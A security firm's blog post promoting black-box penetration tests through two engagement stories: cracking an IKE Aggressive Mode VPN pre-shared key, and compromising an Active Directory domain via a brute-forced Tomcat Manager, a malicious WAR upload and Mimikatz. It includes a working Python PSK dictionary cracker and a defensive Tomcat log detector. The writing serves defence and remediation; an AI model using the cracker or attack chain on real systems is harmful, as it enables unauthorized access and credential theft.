CISO Global (formerly Alpine Security)

Black Box Penetration Test Advantages


The advantages of a Black Box Penetration Test are many. Black Box Penetration Testing finds issues that simple vulnerability scanning will not discover. A Black Box Penetration Test is an unauthenticated test: a penetration test where little is known about the target beyond perhaps an IP address, URL, or building location. In essence, the target's environment is a "black box". As ethical hackers, we have to determine what is inside the black box and how to exploit the vulnerabilities we discover there.

Rather than speak in theory about the advantages of a Black Box Penetration Test, we will discuss specific scenarios in which we discovered major (critical) issues because we used Black Box Penetration Testing. In each case the critical finding was missed by vulnerability scanners.

Scenario 1: External Black Box Penetration Test – Internet Key Exchange (IKE) Aggressive Mode Issue

In this engagement, the client had a VPN server with IKE Aggressive Mode enabled. When IKE Aggressive Mode is used with Pre-Shared Key (PSK) authentication, the responder's authentication hash (HASH_R) is keyed with material derived from the PSK and is returned in the second message of the exchange, in response to the very first packet from a VPN client trying to establish an IPsec tunnel. That message is not encrypted, so anyone who can reach the VPN server can send a single crafted packet, capture the hash, and crack the PSK offline.

In this scenario, we also ran Nessus, a vulnerability scanner. Nessus identified the IKE Aggressive Mode issue as Medium Risk. As part of our penetration test, we captured the VPN PSK hash and cracked the passphrase in 19 minutes. This allowed us to connect to the client's VPN, which had access to critical systems holding Protected Health Information (PHI). We reported this to the client immediately as a Critical finding, despite the "Medium" rating Nessus provided. The client resolved the issue by using a much stronger passphrase and configuring the VPN with a second stage of authentication: after the VPN passphrase, the VPN client is now prompted for Active Directory credentials.
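The reason this is Critical rather than Medium is that nothing secret beyond the PSK goes into the hash, and every other input is visible on the wire. The following is an added example, not code from the engagement or from Alpine Security: it computes HASH_R exactly as RFC 2409 defines it for PSK authentication, plays the role of a gateway answering an Aggressive Mode request, and then plays the attacker recovering the PSK from that answer with a dictionary. All exchange values, passphrases and the wordlist are constructed for the example.

```python
"""Offline cracking of an IKEv1 Aggressive Mode PSK from the responder's cleartext HASH_R.

Constructed example, not from the engagement. Hash construction per RFC 2409:
    SKEYID = prf(PSK, Ni_b | Nr_b)
    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
with prf = HMAC over the negotiated hash (MD5 or SHA-1). In Aggressive Mode every
input except the PSK travels in the clear in messages 1 and 2, so an attacker who
sends one message 1 of their own has everything needed to guess the PSK offline.
"""
import hmac
from typing import Optional


def skeyid_psk(psk: bytes, ni_b: bytes, nr_b: bytes, hash_name: str) -> bytes:
    """SKEYID for pre-shared-key authentication (RFC 2409 section 5.4)."""
    return hmac.new(psk, ni_b + nr_b, hash_name).digest()


def hash_r(psk: bytes, ex: dict, hash_name: str) -> bytes:
    """HASH_R as the responder computes it and as it appears, unencrypted, in message 2."""
    key = skeyid_psk(psk, ex["ni_b"], ex["nr_b"], hash_name)
    data = ex["g_xr"] + ex["g_xi"] + ex["cky_r"] + ex["cky_i"] + ex["sai_b"] + ex["idir_b"]
    return hmac.new(key, data, hash_name).digest()


def crack_psk(captured_hash_r: bytes, ex: dict, hash_name: str, wordlist) -> Optional[bytes]:
    """Attacker side: recompute HASH_R for each candidate PSK and stop on a match.

    Only cleartext fields from the exchange are used; no DH private value is needed.
    """
    for cand in wordlist:
        if hmac.compare_digest(hash_r(cand, ex, hash_name), captured_hash_r):
            return cand
    return None


# Constructed exchange. Fixed bytes stand in for the random nonces, cookies and DH
# public values; an attacker acting as initiator sees or chooses all of these.
EXCHANGE = {
    "cky_i": bytes.fromhex("0123456789abcdef"),   # initiator cookie (attacker's own)
    "cky_r": bytes.fromhex("fedcba9876543210"),   # responder cookie (from message 2)
    "ni_b": bytes(range(0, 20)),                  # attacker's nonce
    "nr_b": bytes(range(20, 40)),                 # responder's nonce (from message 2)
    "g_xi": bytes(range(0, 128)),                 # attacker's DH public value (1024-bit group)
    "g_xr": bytes(range(128, 256)),               # responder's DH public value (from message 2)
    # SA payload body from the attacker's own message 1 (abbreviated constructed bytes)
    "sai_b": bytes.fromhex("00000001000000010000002801010001000000200101000080010005800200028003000180040002"),
    # Responder ID payload body: ID type 2 (FQDN), protocol/port 0, identification data
    "idir_b": b"\x02\x00\x00\x00" + b"vpn.example.com",
}

WEAK_PSK = b"Summer2017"                   # constructed weak passphrase
STRONG_PSK = b"r7F#mQ2v!pL9sXz4@Wk8^bN3"   # constructed high-entropy passphrase
WORDLIST = [b"password", b"cisco123", b"Welcome1", b"Summer2017", b"letmein"]  # constructed


def demo(hash_name: str = "sha1"):
    """Run both sides: the gateway answers with HASH_R, the attacker cracks it offline.

    Returns (psk recovered from the weak gateway, psk recovered from the strong gateway).
    """
    leaked = hash_r(WEAK_PSK, EXCHANGE, hash_name)            # what message 2 carries
    recovered = crack_psk(leaked, EXCHANGE, hash_name, WORDLIST)
    safe = crack_psk(hash_r(STRONG_PSK, EXCHANGE, hash_name), EXCHANGE, hash_name, WORDLIST)
    return recovered, safe


if __name__ == "__main__":
    weak, strong = demo()
    print("weak PSK recovered:", weak)      # b'Summer2017'
    print("strong PSK recovered:", strong)  # None
```

This loop is what psk-crack (shipped with ike-scan) does at scale against the fields that ike-scan -A records; the example uses its own in-memory dictionary rather than ike-scan's file format. Main Mode sends HASH_R only after the exchange has been encrypted, so the same PSK is not exposed this way; disabling Aggressive Mode or moving to certificate authentication removes the exposure, and the stronger passphrase plus second authentication stage the client added are defence in depth on top of that.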

The end result of this scenario is less risk for this client and better protection of PHI. A "Medium" finding, according to Nessus, might never have been treated seriously or "gotten around to". Our Black Box Penetration Test yielded a Critical finding, which was resolved immediately.

Scenario 2: Internal Black Box Penetration Test – Owning the Domain

The Black Box Penetration Test revealed a Critical finding that resulted in full Active Directory Domain compromise

This engagement involved an on-site Black Box Penetration Test. We visited the client's facility, found a free cubicle, unplugged the network cable from the computer there, and plugged it into our laptop. We then performed reconnaissance on the network. Our nmap results showed several web servers running on multiple ports. Manually browsing to them, we discovered that one was exposing the Tomcat Manager interface. We used a Metasploit module to brute-force the Tomcat Manager username and password, which allowed us to deploy a WAR file to the server. The WAR file contained a payload that we encoded to evade antimalware. Browsing to our deployed "package" on the web server executed the payload and gave us a shell. From there, we ran Mimikatz to dump credentials from memory. One of the credentials we recovered was an Active Directory "service" account, and that account was a Domain Admin. At this point, we called off the engagement and worked with the client to mitigate these issues.

It is worth noting that the client routinely performed vulnerability scanning, and the vector we used to gain complete access was never identified as a vulnerability by the scanning software. A weak but non-default password on an exposed management interface is exactly the kind of issue an unauthenticated scanner will not flag: the software is fully patched, the service is meant to be there, and the only problem is what a human is willing to guess.
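What a scanner cannot see, the server's own access log records: a run of failed logins against the Manager from one internal address, a success, and then a deployment. The following is an added example, not code from the engagement or from Alpine Security. It parses Tomcat's default access-log format, counts 401 responses to /manager per source address, and flags a source that fails repeatedly and then succeeds, or that deploys an application through the Manager. The log lines, addresses, user names and application path are constructed for the example.

```python
"""Spot Tomcat Manager brute-forcing and WAR deployment in Tomcat access logs.

Constructed example, not from the engagement. Parses the default AccessLogValve
"common" pattern (%h %l %u %t "%r" %s %b). A source address is reported when it
(a) fails authentication to /manager at least `fail_threshold` times and then gets a
2xx, or (b) deploys an application through any Manager deploy endpoint.
"""
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
MANAGER_PATH = re.compile(r"^/manager(/|\?|$)")
# Manager endpoints that install a WAR: HTML upload form, text interface, legacy deploy URL
DEPLOY_PATH = re.compile(r"^/manager/(html/upload|text/deploy|deploy)(\?|$)")


def parse_line(line: str):
    """Return the parsed fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def analyze(lines, fail_threshold: int = 5) -> dict:
    """Return {source_ip: summary} for sources that brute-forced or deployed via the Manager."""
    per_ip = defaultdict(lambda: {"failed_logins": 0, "success_after_failures": False,
                                  "users": set(), "deploys": []})
    for line in lines:
        rec = parse_line(line)
        if rec is None or not MANAGER_PATH.match(rec["path"]):
            continue
        s = per_ip[rec["host"]]
        if rec["status"] == 401:
            s["failed_logins"] += 1                      # Manager challenged, wrong or no creds
        elif 200 <= rec["status"] < 300:
            if rec["user"] != "-":
                s["users"].add(rec["user"])              # %u is set once Basic auth succeeded
            if s["failed_logins"] >= fail_threshold:
                s["success_after_failures"] = True       # guessing paid off
            if rec["method"] in ("PUT", "POST") and DEPLOY_PATH.match(rec["path"]):
                s["deploys"].append(rec["path"])         # a WAR was installed
    return {ip: s for ip, s in per_ip.items()
            if s["failed_logins"] >= fail_threshold or s["deploys"]}


# Constructed log: an internal host guesses Manager credentials six times, gets in as
# "tomcat", uploads a WAR, then requests the deployed application; an admin logs in once.
SAMPLE_LOG = """\
10.20.30.40 - - [12/Feb/2017:14:03:11 -0600] "GET /manager/html HTTP/1.1" 401 2473
10.20.30.40 - - [12/Feb/2017:14:03:11 -0600] "GET /manager/html HTTP/1.1" 401 2473
10.20.30.40 - - [12/Feb/2017:14:03:12 -0600] "GET /manager/html HTTP/1.1" 401 2473
10.20.30.40 - - [12/Feb/2017:14:03:12 -0600] "GET /manager/html HTTP/1.1" 401 2473
10.20.30.40 - - [12/Feb/2017:14:03:13 -0600] "GET /manager/html HTTP/1.1" 401 2473
10.20.30.40 - - [12/Feb/2017:14:03:13 -0600] "GET /manager/html HTTP/1.1" 401 2473
10.20.30.40 - tomcat [12/Feb/2017:14:03:15 -0600] "GET /manager/html HTTP/1.1" 200 17456
10.20.30.40 - tomcat [12/Feb/2017:14:03:21 -0600] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=C0FFEE HTTP/1.1" 200 17890
10.20.30.40 - - [12/Feb/2017:14:03:24 -0600] "GET /Hx9kQ2/ HTTP/1.1" 200 42
10.0.0.5 - admin [12/Feb/2017:15:10:02 -0600] "GET /manager/html HTTP/1.1" 200 17456
"""

if __name__ == "__main__":
    for ip, summary in analyze(SAMPLE_LOG.splitlines()).items():
        print(ip, summary)
```

Run against the real log directory, a hit on the deploy pattern from any address that is not a known deployment host is worth an alert on its own; the failed-login threshold is there to separate an attacker from an administrator who mistyped a password. The same logic applies when the Manager is later locked to specific source addresses with a RemoteAddrValve, because requests rejected by the valve still appear in the access log.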

The outcome of this scenario was that the client implemented several security controls, including 802.1X port-based network access control, reduced service account permissions, removal of unnecessary services, and stronger passwords.

Unfortunately, many organizations have a false sense of security because they run a vulnerability scanning tool on a routine basis. We certainly believe this is a great step in the right direction; however, a vulnerability scanning tool does not catch everything. If you are concerned about the true cybersecurity risk to your organization, consider a Black Box Penetration Test.

Contact us with questions or to purchase a Black Box Penetration Test.

Tags: black box penetration test, ethical hacking, IKE aggressive mode, Nessus, penetration testing, Tomcat Manager, vulnerability scanning

© 2021 · Alpine Security, a Cerberus Sentinel Company